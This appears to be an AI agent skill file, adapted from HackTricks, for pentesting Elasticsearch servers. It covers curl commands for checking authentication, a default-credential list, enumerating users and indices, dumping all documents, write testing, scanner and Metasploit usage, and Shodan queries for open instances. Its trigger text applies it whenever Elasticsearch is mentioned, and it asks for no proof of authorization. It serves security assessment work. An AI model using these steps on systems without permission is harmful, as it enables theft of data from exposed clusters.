Hacktricks-skills elasticsearch-pentest
Pentest and enumerate Elasticsearch instances (port 9200). Use this skill whenever the user mentions Elasticsearch, elastic, port 9200, ELK stack, or needs to enumerate/search/dump data from an Elasticsearch server. This includes checking authentication, listing indices, extracting documents, and testing write permissions.
Install
Source: clone the upstream repo

```bash
git clone https://github.com/abelrguezr/hacktricks-skills
```

Manifest: skills/network-services-pentesting/9200-pentesting-elasticsearch/SKILL.MD
Source content
Elasticsearch Pentesting Skill
A skill for enumerating and testing Elasticsearch instances during security assessments.
When to Use This Skill
Use this skill when:
- You need to enumerate an Elasticsearch instance (port 9200)
- You want to check if authentication is enabled
- You need to list indices or dump documents
- You're testing write permissions on an Elasticsearch server
- The user mentions "Elasticsearch", "elastic", "ELK stack", "port 9200", or similar terms
Quick Start
```bash
# Basic banner check
curl -X GET "http://TARGET:9200/"

# Check if authentication is disabled
curl -X GET "http://TARGET:9200/_xpack/security/user"

# List all indices
curl -X GET "http://TARGET:9200/_cat/indices?v"
```
Authentication Testing
Check if Auth is Disabled
Elasticsearch installations frequently run with authentication disabled (security was off by default before 8.0). Test this:
```bash
curl -X GET "http://TARGET:9200/_xpack/security/user"
```

Response indicating NO auth:

```json
{"error":{"root_cause":[{"type":"exception","reason":"Security must be explicitly enabled..."}]},"status":500}
```

Response indicating auth IS enabled:

```json
{"error":{"root_cause":[{"type":"security_exception","reason":"missing authentication credentials..."}]},"status":401}
```
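When triaging many hosts, or when writing a recurring check that a cluster is not left open, it helps to classify the `_xpack/security/user` response programmatically rather than by eye. The Python helper below is an added example (not part of the skill or of HackTricks); the three sample bodies are constructed to mirror the shapes shown above.

```python
import json

# Constructed sample bodies (not captured from a real host). The first two
# mirror the "no auth" and "auth enabled" responses shown above; the third is
# the shape returned when the request carried valid credentials.
NO_AUTH_BODY = (
    '{"error":{"root_cause":[{"type":"exception",'
    '"reason":"Security must be explicitly enabled..."}]},"status":500}'
)
AUTH_REQUIRED_BODY = (
    '{"error":{"root_cause":[{"type":"security_exception",'
    '"reason":"missing authentication credentials..."}]},"status":401}'
)
AUTHENTICATED_BODY = '{"elastic":{"username":"elastic","roles":["superuser"],"enabled":true}}'


def classify_security_response(body: str) -> str:
    """Classify the body of GET /_xpack/security/user.

    Returns:
      "no_auth"       - security disabled: the node accepts anonymous access
      "auth_required" - security enabled and credentials missing or rejected
      "authenticated" - request accepted; body is a map of user objects
      "unknown"       - non-JSON or an unexpected shape
    """
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return "unknown"
    if not isinstance(data, dict) or not data:
        return "unknown"
    error = data.get("error")
    if error is None:
        # A successful call returns {username: {..., "roles": [...]}, ...}
        if all(isinstance(u, dict) and "roles" in u for u in data.values()):
            return "authenticated"
        return "unknown"
    causes = error.get("root_cause") if isinstance(error, dict) else None
    cause = causes[0] if isinstance(causes, list) and causes and isinstance(causes[0], dict) else {}
    if data.get("status") == 401 or cause.get("type") == "security_exception":
        return "auth_required"
    if "Security must be explicitly enabled" in str(cause.get("reason", "")):
        return "no_auth"
    return "unknown"
```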
Default Credentials to Try
If authentication is enabled, try these default credentials:
| Username | Default Password |
|---|---|
| elastic | changeme |
| elastic | password |
| elastic | elastic |
| kibana_system | changeme |
| logstash_system | changeme |
| beats_system | changeme |
| remote_monitoring_user | changeme |
```bash
curl -X GET "http://elastic:changeme@TARGET:9200/"
```
Enumeration
List All Available Endpoints
```bash
# Get all _cat endpoints
curl -X GET "http://TARGET:9200/_cat"

# Get cluster info
curl -X GET "http://TARGET:9200/_cluster/health"
curl -X GET "http://TARGET:9200/_cluster/settings"
curl -X GET "http://TARGET:9200/_cluster/state"
```
User and Role Enumeration
```bash
# List all users
curl -X GET "http://TARGET:9200/_security/user"

# List all roles
curl -X GET "http://TARGET:9200/_security/role"

# Get specific user info
curl -X GET "http://TARGET:9200/_security/user/USERNAME"
```
Index Enumeration
```bash
# List all indices with details
curl -X GET "http://TARGET:9200/_cat/indices?v"

# Get index mapping/schema
curl -X GET "http://TARGET:9200/INDEX_NAME"

# Get index settings
curl -X GET "http://TARGET:9200/INDEX_NAME/_settings"
```
Data Extraction
Dump All Documents from an Index
```bash
# Default returns 10 documents
curl -X GET "http://TARGET:9200/INDEX_NAME/_search?pretty=true"

# Dump all documents (adjust size as needed)
curl -X GET "http://TARGET:9200/INDEX_NAME/_search?pretty=true&size=10000"
```
Dump All Documents from All Indices
```bash
curl -X GET "http://TARGET:9200/_search?pretty=true&size=10000"
```
Search for Specific Content
```bash
# Search all indices
curl -X GET "http://TARGET:9200/_search?pretty=true&q=SEARCH_TERM"

# Search specific index
curl -X GET "http://TARGET:9200/INDEX_NAME/_search?pretty=true&q=SEARCH_TERM"

# Search with regex
curl -X GET "http://TARGET:9200/_search?pretty=true&q=.*password.*"
```
Write Permission Testing
Create a Test Document
```bash
# Index the document with a known ID (PUT) so it can be read back below.
# A POST without an ID would auto-generate one, and the read-back by
# PENTEST-001 would 404. "_doc" is the type name accepted by 6.x and
# required from 7.x onwards.
curl -X PUT "http://TARGET:9200/testindex/_doc/PENTEST-001" \
  -H "Content-Type: application/json" \
  -d '{
    "testId": "PENTEST-001",
    "author": "Pentester",
    "timestamp": "'"$(date -Iseconds)"'",
    "note": "Testing write permissions"
  }'
```

Verify Write Access

```bash
# Check if test index was created
curl -X GET "http://TARGET:9200/_cat/indices?v" | grep testindex

# Read back the document
curl -X GET "http://TARGET:9200/testindex/_doc/PENTEST-001?pretty=true"
```
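Rather than piping `_cat/indices?v` through `grep`, the verbose table can be parsed into structured rows, which serves both the Index Enumeration step (how many indices and documents are reachable) and the check above that the test index exists with one document. This Python helper is an added example (not part of the skill or of HackTricks); the sample output it parses is constructed, including a closed-index row whose health and document columns are blank.

```python
import re
from typing import Dict, List, Optional

# Constructed sample of `GET /_cat/indices?v` output (not captured from a
# real host). Columns are whitespace-aligned under the header line; the last
# row mimics a closed index whose health and document columns are blank.
SAMPLE_CAT_INDICES = """\
health status index     uuid                   pri rep docs.count docs.deleted store.size pri.store.size
yellow open   customers a1b2c3d4e5f6g7h8i9j0kl   1   1      12034            3      8.1mb          8.1mb
green  open   .kibana_1 z9y8x7w6v5u4t3s2r1q0po   1   0         42            0    120.4kb        120.4kb
yellow open   testindex m1n2o3p4q5r6s7t8u9v0wx   1   1          1            0      4.5kb          4.5kb
       close  old_logs  q1w2e3r4t5y6u7i8o9p0as   1   0
"""

Row = Dict[str, Optional[str]]


def parse_cat_indices(text: str) -> List[Row]:
    """Parse verbose _cat output into one dict per index.

    Each token on a data row is assigned to the header column whose span
    covers the token's midpoint, so right-aligned numbers and blank cells
    (which a plain str.split() would shift into the wrong column) are handled.
    """
    lines = [ln for ln in text.splitlines() if ln.strip()]
    if not lines:
        return []
    heads = [(m.group(), m.start()) for m in re.finditer(r"\S+", lines[0])]
    bounds = [start for _, start in heads[1:]] + [float("inf")]
    rows: List[Row] = []
    for ln in lines[1:]:
        row: Row = {name: None for name, _ in heads}
        for tok in re.finditer(r"\S+", ln):
            mid = (tok.start() + tok.end() - 1) / 2
            for (name, start), end in zip(heads, bounds):
                if start <= mid < end:
                    row[name] = tok.group()
                    break
        rows.append(row)
    return rows


def find_index(rows: List[Row], name: str) -> Optional[Row]:
    """Return the row for `name`, or None (a structured `grep testindex`)."""
    return next((r for r in rows if r.get("index") == name), None)


def doc_count(rows: List[Row], name: str) -> Optional[int]:
    """Document count for `name`, or None if absent or not reported."""
    row = find_index(rows, name)
    if row is None or not row.get("docs.count"):
        return None
    return int(row["docs.count"])


def exposed_summary(rows: List[Row]) -> Dict[str, int]:
    """Count non-system indices (no leading dot) and their documents."""
    user = [r for r in rows if not (r.get("index") or ".").startswith(".")]
    docs = sum(int(r["docs.count"]) for r in user if r.get("docs.count"))
    return {"indices": len(user), "documents": docs}
```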
Cleanup Test Data
```bash
# Delete test index
curl -X DELETE "http://TARGET:9200/testindex"
```
Useful Endpoints Reference
| Endpoint | Purpose |
|---|---|
| `/_cat/indices?v` | List all indices |
| `/_cat/nodes?v` | List cluster nodes |
| `/_cat/shards?v` | Show shard allocation |
| `/_cat/health?v` | Cluster health status |
| `/_cat/repositories?v` | List backup repositories |
| `/_cat/plugins?v` | List installed plugins |
| `/_cat/aliases?v` | List index aliases |
| `/_cluster/health` | Detailed health info |
| `/_cluster/settings` | Cluster settings |
| `/_nodes/stats` | Node statistics |
| `/_security/user` | List users (auth required) |
| `/_security/role` | List roles (auth required) |
| `/_search` | Search all indices |
Automated Tools
Nmap NSE Scripts
```bash
# Using nmap-elasticsearch-nse
nmap --script elasticsearch-info -p 9200 TARGET
nmap --script elasticsearch-indices -p 9200 TARGET
```
Metasploit
```bash
msfconsole
use auxiliary/scanner/elasticsearch/indices_enum
set RHOSTS TARGET
run
```
Horuz (Fuzzing)
```bash
# https://github.com/misalabs/horuz
horuz -t TARGET -p 9200
```
Shodan Queries
```text
# Find Elasticsearch instances
port:9200 elasticsearch

# Find unauthenticated instances
port:9200 elasticsearch "You know, for search"

# Find specific versions
port:9200 elasticsearch "version.number":"7."
```
Common Vulnerabilities to Check
- No Authentication - Default installations often have no auth
- Default Credentials - `elastic:changeme` is common
- Cross-Site Scripting (XSS) - In Kibana dashboards
- Remote Code Execution - Via Groovy scripts in older versions
- Privilege Escalation - Weak role configurations
- Data Exposure - Sensitive data in indices
- Write Access - Ability to inject malicious documents
Workflow Summary
- Reconnaissance - Check banner, version, and authentication status
- Enumeration - List indices, users, roles, and cluster info
- Data Extraction - Dump documents from indices
- Write Testing - Attempt to create/modify documents
- Privilege Escalation - Test for superuser access
- Cleanup - Remove any test data created
Notes
- Elasticsearch uses HTTP/HTTPS (default port 9200)
- Documents are stored as JSON
- Default result limit is 10 documents per query
- Use the `size` parameter to increase result count
- Some endpoints require authentication
- Always clean up test data after testing
- Be careful with production systems - read operations are safe, write operations can cause issues